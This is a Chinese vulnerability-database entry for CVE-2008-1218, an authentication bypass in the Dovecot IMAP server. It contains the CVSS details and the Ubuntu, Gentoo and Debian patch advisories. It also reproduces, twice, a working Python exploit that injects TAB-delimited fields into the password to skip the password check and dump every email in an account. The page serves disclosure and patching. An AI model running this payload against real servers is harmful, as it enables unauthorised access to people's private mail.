| CVE-2008-1218 |
|
发布时间 :2008-03-10 19:44:00 | ||
| 修订时间 :2011-03-07 22:06:20 | ||||
| NMCOEPS |
[原文]Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
[CNNVD]Dovecot Tab 字符绕过口令检查漏洞和未授权访问漏洞(CNNVD-200803-106)
Dovecot是Linux/UNIX类系统平台上的开源IMAP和POP3服务器。
Dovecot对用户请求数据没有充分的检查过滤,远程攻击者可能利用此漏洞绕过验证获取非授权访问。
Dovecot的内部协议使用TAB字符作为分隔符,但未经转义便发送了口令,因此如果口令中包含有TAB字符的话,就可以添加新的内部字段。如果用户在登录时通过这种方式添加了skip_password_check字段的话,就可以绕过口令检查,获得非授权登录。
–
CVSS (基础分值)
| CVSS分值: | 6.8 | [中等(MEDIUM)] |
| 机密性影响: | PARTIAL | [很可能造成信息泄露] |
| 完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
| 可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
| 攻击复杂度: | MEDIUM | [漏洞利用存在一定的访问条件] |
| 攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
| 身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
| CWE-255 | [凭证管理] |
–
CPE (受影响的平台与产品)
| cpe:/a:dovecot:dovecot:1.1:rc2 | |
| cpe:/a:dovecot:dovecot:1.0.12 |
–
OVAL (用于检测的技术细节)
| oval:org.mitre.oval:def:8054 | DSA-1516 dovecot — privilege escalation |
| *OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。 | |
–
官方数据库链接
–
其它链接及资源
–
漏洞信息
| Dovecot Tab 字符绕过口令检查漏洞和未授权访问漏洞 | |
| 中危 | 信任管理 |
| 2008-03-10 00:00:00 | 2008-10-10 00:00:00 |
| 远程 | |
| Dovecot是Linux/UNIX类系统平台上的开源IMAP和POP3服务器。 Dovecot对用户请求数据没有充分的检查过滤,远程攻击者可能利用此漏洞绕过验证获取非授权访问。 Dovecot的内部协议使用TAB字符作为分隔符,但未经转义便发送了口令,因此如果口令中包含有TAB字符的话,就可以添加新的内部字段。如果用户在登录时通过这种方式添加了skip_password_check字段的话,就可以绕过口令检查,获得非授权登录。 |
|
–
公告与补丁
|
目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接: http://www.debian.org/security/2008/dsa-1516 http://www.dovecot.org/list/dovecot-news/2008-March/000065.html |
–
漏洞信息 (5257)
| Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit (EDBID:5257) | |
| multiple | remote |
| 2008-03-14 | Verified |
| 0 | Kingcope |
N/A |
[点击下载] |
#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib
print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"
if len(sys.argv)<3:
print "usage: %s [-nossl]" % sys.argv[0]
exit(0);
if len(sys.argv)>3 and sys.argv[3] == "-nossl":
M = imaplib.IMAP4(sys.argv[1])
else:
M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
typ, data = M.fetch(num, '(RFC822)')
print 'Message %s\n%s\n' % (num, data[0][1])
k=k+1
M.close()
M.logout()
print "Messages read: %s" % k
# milw0rm.com [2008-03-14]
–
漏洞信息 (F64909)
| Ubuntu Security Notice 593-1 (PacketStormID:F64909) |
2008-03-26 00:00:00 |
| Ubuntu security.ubuntu.com |
advisory |
linux,ubuntu |
CVE-2008-1199,CVE-2008-1218 |
[点击下载] |
|
Ubuntu Security Notice 593-1 – It was discovered that the default configuration of dovecot could allow access to any email files with group “mail” without verifying that a user had valid rights. An attacker able to create symlinks in their mail directory could exploit this to read or delete another user's email. By default, dovecot passed special characters to the underlying authentication systems. While Ubuntu releases of dovecot are not known to be vulnerable, the authentication routine was proactively improved to avoid potential future problems. |
===========================================================
Ubuntu Security Notice USN-593-1 March 26, 2008
dovecot vulnerabilities
CVE-2008-1199, CVE-2008-1218
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
dovecot-common 1.0.beta3-3ubuntu5.6
dovecot-imapd 1.0.beta3-3ubuntu5.6
dovecot-pop3d 1.0.beta3-3ubuntu5.6
Ubuntu 6.10:
dovecot-common 1.0.rc2-1ubuntu2.3
dovecot-imapd 1.0.rc2-1ubuntu2.3
dovecot-pop3d 1.0.rc2-1ubuntu2.3
Ubuntu 7.04:
dovecot-common 1.0.rc17-1ubuntu2.3
dovecot-imapd 1.0.rc17-1ubuntu2.3
dovecot-pop3d 1.0.rc17-1ubuntu2.3
Ubuntu 7.10:
dovecot-common 1:1.0.5-1ubuntu2.2
dovecot-imapd 1:1.0.5-1ubuntu2.2
dovecot-pop3d 1:1.0.5-1ubuntu2.2
After a standard system upgrade, additional dovecot configuration changes
are needed.
ATTENTION: Due to an unavoidable configuration update, the dovecot
settings in /etc/dovecot/dovecot.conf need to be updated manually.
During the update, a configuration file conflict will be shown.
The default setting "mail_extra_groups = mail" should be changed to
"mail_privileged_group = mail". If your local configuration uses groups
other than "mail", you may need to use the new "mail_access_groups"
setting as well.
Details follow:
It was discovered that the default configuration of dovecot could allow
access to any email files with group "mail" without verifying that a user
had valid rights. An attacker able to create symlinks in their mail
directory could exploit this to read or delete another user's email.
(CVE-2008-1199)
By default, dovecot passed special characters to the underlying
authentication systems. While Ubuntu releases of dovecot are not known
to be vulnerable, the authentication routine was proactively improved
to avoid potential future problems. (CVE-2008-1218)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.beta3-3ubuntu5.6.diff.gz
Size/MD5: 482805 f572acb482f90bb083314e880a772806
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.beta3-3ubuntu5.6.dsc
Size/MD5: 867 f388415adecfb6e6b66821c601202954
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.beta3.orig.tar.gz
Size/MD5: 1360574 5418f9f7fe99e4f10bb82d9fe504138a
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_amd64.deb
Size/MD5: 968546 0a9feb89c2b960cbb283a0a957c1ab3b
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_amd64.deb
Size/MD5: 535154 c3fabd531b6c633a48ee9d3dfe5fbea9
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_amd64.deb
Size/MD5: 503144 bb2ae9e81eb6188263827cb87cba29e7
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_i386.deb
Size/MD5: 842602 3a3b5f8a056546dcad50211b6a66b17e
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_i386.deb
Size/MD5: 487858 735fe4c9291d8f3e2f6ea93df9e6a722
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_i386.deb
Size/MD5: 458548 a32d03a27e76610ef5e9a5b25adc369d
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_powerpc.deb
Size/MD5: 946420 888fd964ff401c9436810f59a56c960e
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_powerpc.deb
Size/MD5: 528892 65204a0f2de667fcc5bb7097c2973df9
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_powerpc.deb
Size/MD5: 496616 8b71cb5999b41bd150d1427090f5266a
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.beta3-3ubuntu5.6_sparc.deb
Size/MD5: 859702 096725e1d08fb32b4c30e4cb06a303ee
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.beta3-3ubuntu5.6_sparc.deb
Size/MD5: 494022 69cb816c90fbc8c154860150beb54df1
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.beta3-3ubuntu5.6_sparc.deb
Size/MD5: 464254 49ef9af48a8bcbc1b43cf64e579c8bac
Updated packages for Ubuntu 6.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc2-1ubuntu2.3.diff.gz
Size/MD5: 481921 30469a011f337d9ea2af0d5660cdc3bb
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc2-1ubuntu2.3.dsc
Size/MD5: 900 103e47535573605f059bfe512bbe9e9d
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc2.orig.tar.gz
Size/MD5: 1257435 e27a248b2ee224e4618aa2f020150041
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_amd64.deb
Size/MD5: 941192 6d872ad2200983d3c6fb0af0af1689b4
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_amd64.deb
Size/MD5: 389328 d249f6bee773d0302cb500107d5c30f1
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_amd64.deb
Size/MD5: 355572 af818dec4a8102797efe010c52d2f3da
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_i386.deb
Size/MD5: 837862 a2e1e5ab801a81bd7ede896c68b471dc
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_i386.deb
Size/MD5: 356148 fe47879721273c223fdb02b820572c2d
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_i386.deb
Size/MD5: 325538 930636d7b634b371ef7564a54f7ebbc8
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_powerpc.deb
Size/MD5: 930236 0e501c64167c62697a6d35f77723f626
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_powerpc.deb
Size/MD5: 387640 e383c12a8ae5f38f99b5605fe615d303
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_powerpc.deb
Size/MD5: 354172 3b497cae8495e559124a8a32d0199fec
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc2-1ubuntu2.3_sparc.deb
Size/MD5: 825242 483e84acb29649b05fd20b0516462e36
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc2-1ubuntu2.3_sparc.deb
Size/MD5: 349766 ae08a2bc0af7693fd3eba475cdefea81
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc2-1ubuntu2.3_sparc.deb
Size/MD5: 318894 b0962827bc67760168431aa08407c40a
Updated packages for Ubuntu 7.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc17-1ubuntu2.3.diff.gz
Size/MD5: 110359 d45086b091902ffe4c897a37500640ef
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc17-1ubuntu2.3.dsc
Size/MD5: 1100 2ebee5689361d891820080b8c03c1b80
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.rc17.orig.tar.gz
Size/MD5: 1512386 881bcc7d2c8fba6d337f3e616a602bf7
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_amd64.deb
Size/MD5: 1279482 7ca87aed81c784bc5fadcf51df7bb07b
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_amd64.deb
Size/MD5: 589038 f7053e7a3037267a13de1b7d7daba6ae
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_amd64.deb
Size/MD5: 554270 7f92ed3a933b775a6301b1d8723e60d0
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_i386.deb
Size/MD5: 1169674 fc5fbc9f8b4c33fb2f773c7767625c79
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_i386.deb
Size/MD5: 556308 13e0b06665a17c56da6d17ec3af892ca
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_i386.deb
Size/MD5: 523676 681dd1951ef3d61b225930f9ba20f1d4
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_powerpc.deb
Size/MD5: 1296474 b691fd7d6d5a5df7b08af8d732f806e1
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_powerpc.deb
Size/MD5: 593374 77b2a2b0bf8f05c5fd8c03887dd0739d
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_powerpc.deb
Size/MD5: 558844 03bde80aa2b1282c9131590cc530e68d
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.rc17-1ubuntu2.3_sparc.deb
Size/MD5: 1163166 66565dbe0abf26fa13e1eae8d51f81f8
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.rc17-1ubuntu2.3_sparc.deb
Size/MD5: 551744 d7858288e8326aad4cff410e5336ce1d
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.rc17-1ubuntu2.3_sparc.deb
Size/MD5: 519076 45e334d300da1c76f5da042d0dbbfe44
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.5-1ubuntu2.2.diff.gz
Size/MD5: 116694 c21b8fd1aa899cec34c5428d953ba992
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.5-1ubuntu2.2.dsc
Size/MD5: 1115 74def18e831b00a23b5ee06f36634e55
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_1.0.5.orig.tar.gz
Size/MD5: 1775898 94b7d29cf44f63f89d538361afa05c40
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_amd64.deb
Size/MD5: 1822104 aebc0d840798e22dd1794b12f65fb65f
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_amd64.deb
Size/MD5: 656608 d3ad8a6801d0be7060a2f57787cd93db
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_amd64.deb
Size/MD5: 620032 ed96dadf810230c3f19fb1c07963b551
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_i386.deb
Size/MD5: 1680262 d4014ff94fd68f928c8b91a2bfbf8143
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_i386.deb
Size/MD5: 623590 2b42a167edcc0614b6f2b657319bda7d
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_i386.deb
Size/MD5: 590130 2bab04499b1cbf80042248ba3250c585
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_powerpc.deb
Size/MD5: 1840504 d989541e39e1ddad883537907502b0f4
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_powerpc.deb
Size/MD5: 659636 cb7c4ca376b74c8e36ae80b14277c25d
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_powerpc.deb
Size/MD5: 624332 022c275417a9ac846b5ed09eea225e84
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-common_1.0.5-1ubuntu2.2_sparc.deb
Size/MD5: 1674688 798e926a5b6180a64fced9c592b38762
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-imapd_1.0.5-1ubuntu2.2_sparc.deb
Size/MD5: 620580 9fb4843e505d09dcc0374b6bbc4dbb3b
http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot-pop3d_1.0.5-1ubuntu2.2_sparc.deb
Size/MD5: 587500 08bd76dc21c61c368b092d9c6d674e0a
–
漏洞信息 (F64681)
| Gentoo Linux Security Advisory 200803-25 (PacketStormID:F64681) |
2008-03-19 00:00:00 |
| Gentoo security.gentoo.org |
advisory,arbitrary |
linux,gentoo |
CVE-2008-1199,CVE-2008-1218 |
[点击下载] |
|
Gentoo Linux Security Advisory GLSA 200803-25 – Dovecot uses the group configured via the mail_extra_groups setting, which should be used to create lockfiles in the /var/mail directory, when accessing arbitrary files (CVE-2008-1199). Dovecot does not escape TAB characters in passwords when saving them, which might allow for argument injection in blocking passdbs such as MySQL, PAM or shadow (CVE-2008-1218). Versions less than 1.0.13-r1 are affected. |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200803-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Dovecot: Multiple vulnerabilities
Date: March 18, 2008
Bugs: #212336, #213030
ID: 200803-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Two vulnerabilities in Dovecot allow for information disclosure and
argument injection.
Background
==========
Dovecot is a lightweight, fast and easy to configure IMAP and POP3 mail
server.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-mail/dovecot < 1.0.13-r1 >= 1.0.13-r1
Description
===========
Dovecot uses the group configured via the "mail_extra_groups" setting,
which should be used to create lockfiles in the /var/mail directory,
when accessing arbitrary files (CVE-2008-1199). Dovecot does not escape
TAB characters in passwords when saving them, which might allow for
argument injection in blocking passdbs such as MySQL, PAM or shadow
(CVE-2008-1218).
Impact
======
Remote attackers can exploit the first vulnerability to disclose
sensitive data, such as the mail of other users, or modify files or
directories that are writable by group via a symlink attack. Please
note that the "mail_extra_groups" setting is set to the "mail" group by
default when the "mbox" USE flag is enabled.
The second vulnerability can be abused to inject arguments for internal
fields. No exploitation vectors are known for this vulnerability that
affect previously stable versions of Dovecot in Gentoo.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Dovecot users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.0.13-r1"
This version removes the "mail_extra_groups" option and introduces a
"mail_privileged_group" setting which is handled safely.
References
==========
[ 1 ] CVE-2008-1199
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1199
[ 2 ] CVE-2008-1218
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1218
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200803-25.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
–
漏洞信息 (F64608)
| dovecot-disclose.txt (PacketStormID:F64608) |
2008-03-15 00:00:00 |
| Kingcope |
exploit,remote,imap,info disclosure |
CVE-2008-1218 |
[点击下载] |
|
Dovecot IMAP versions 1.0.10 through 1.1rc2 remote email disclosure exploit. |
#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib
print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"
if len(sys.argv)<3:
print "usage: %s [-nossl]" % sys.argv[0]
exit(0);
if len(sys.argv)>3 and sys.argv[3] == "-nossl":
M = imaplib.IMAP4(sys.argv[1])
else:
M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
typ, data = M.fetch(num, '(RFC822)')
print 'Message %s\n%s\n' % (num, data[0][1])
k=k+1
M.close()
M.logout()
print "Messages read: %s" % k
–
漏洞信息 (F64601)
| Debian Linux Security Advisory 1516-1 (PacketStormID:F64601) |
2008-03-15 00:00:00 |
| Debian debian.org |
advisory |
linux,debian |
CVE-2008-1199,CVE-2008-1218 |
[点击下载] |
|
Debian Security Advisory 1516-1 – Prior to this update, the default configuration for Dovecot used by Debian runs the server daemons with group mail privileges. This means that users with write access to their mail directory by other means (for example, through an SSH login) could read mailboxes owned by other users for which they do not have direct write access. In addition, an internal interpretation conflict in password handling has been addressed pro-actively, even though it is not known to be exploitable. |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1516-1 [email protected] http://www.debian.org/security/ Florian Weimer March 14, 2008 http://www.debian.org/security/faq - ---------------------------------------------------------------------- Package : dovecot Vulnerability : privilege escalation Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-1199 CVE-2008-1218 Debian Bug : 469457 Prior to this update, the default configuration for Dovecot used by Debian runs the server daemons with group mail privileges. This means that users with write access to their mail directory by other means (for example, through an SSH login) could read mailboxes owned by other users for which they do not have direct write access (CVE-2008-1199). In addition, an internal interpretation conflict in password handling has been addressed proactively, even though it is not known to be exploitable (CVE-2008-1218). Note that applying this update requires manual action: The configuration setting "mail_extra_groups = mail" has been replaced with "mail_privileged_group = mail". The update will show a configuration file conflict in /etc/dovecot/dovecot.conf. It is recommended that you keep the currently installed configuration file, and change the affected line. For your reference, the sample configuration (without your local changes) will have been written to /etc/dovecot/dovecot.conf.dpkg-new. If your current configuration uses mail_extra_groups with a value different from "mail", you may have to resort to the mail_access_groups configuration directive. For the stable distribution (etch), these problems have been fixed in version 1.0.rc15-2etch4. For the unstable distribution (sid), these problems have been fixed in version 1.0.13-1. For the old stable distribution (sarge), no updates are provided. We recommend that you consider upgrading to the stable distribution. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.dsc Size/MD5 checksum: 1300 8146ccf246ed64e1ac8c0127489ec798 http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15.orig.tar.gz Size/MD5 checksum: 1463069 26f3d2b075856b1b1d180146363819e6 http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.diff.gz Size/MD5 checksum: 102991 21959fc45cf0f8932fa9eb890791ff39 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_alpha.deb Size/MD5 checksum: 583482 a0d18885da096140ceb4110d525569d4 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_alpha.deb Size/MD5 checksum: 1379844 6103bce830848d3f9bb4347f5c9b94f0 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_alpha.deb Size/MD5 checksum: 621320 48127903af1fe2130cb84c57e5a607ff amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_amd64.deb Size/MD5 checksum: 1222430 1c2e1ffeb6bf745ed88cde01c62d264a http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_amd64.deb Size/MD5 checksum: 536634 4f64ed0cc16510e9c3d709342b3c57ca http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_amd64.deb Size/MD5 checksum: 569588 c17bac715f188f55ae20e5a3c95109b1 arm architecture (ARM) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_arm.deb Size/MD5 checksum: 1123030 47eb9fddcc68c2c213afa10c8e3d8747 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_arm.deb Size/MD5 checksum: 506134 0f4d939f2cf68f4e5b01140c846e50bc http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_arm.deb Size/MD5 checksum: 537564 82310ae4e42406429f8ade7cbb81abf0 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_hppa.deb Size/MD5 checksum: 1298818 603d12284115b6349e1d0334263d2af0 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_hppa.deb Size/MD5 checksum: 562192 413ac964849698428c1b08e9cc9075bc http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_hppa.deb Size/MD5 checksum: 598934 811c32b5c7e2009e5bf2f0ee0ea26859 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_i386.deb Size/MD5 checksum: 1133484 3bf26ab783ddffed0b3c5ee53225ba20 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_i386.deb Size/MD5 checksum: 546528 d53c11fd1c39870bd208d684e70e7551 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_i386.deb Size/MD5 checksum: 514280 e85dcbcdd9b85f6e09cdeb4c82b47916 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_ia64.deb Size/MD5 checksum: 793878 106fe266dd26373615772b4e3636a914 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_ia64.deb Size/MD5 checksum: 737582 18b15162711b22a704d0ff1ff26e0261 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_ia64.deb Size/MD5 checksum: 1701788 7535b0a3407f664efa66bcf86966ff85 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_mips.deb Size/MD5 checksum: 559520 96d7ff1bbd3a38fbdd3bd06b4bc939fb http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_mips.deb Size/MD5 checksum: 594680 41536feb8048183b78f0d1742278520c http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_mips.deb Size/MD5 checksum: 1265800 a42823e1253c78709d5d1c18668d9b40 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_mipsel.deb Size/MD5 checksum: 1268408 25c8582fea24e3174283066b7c8b6525 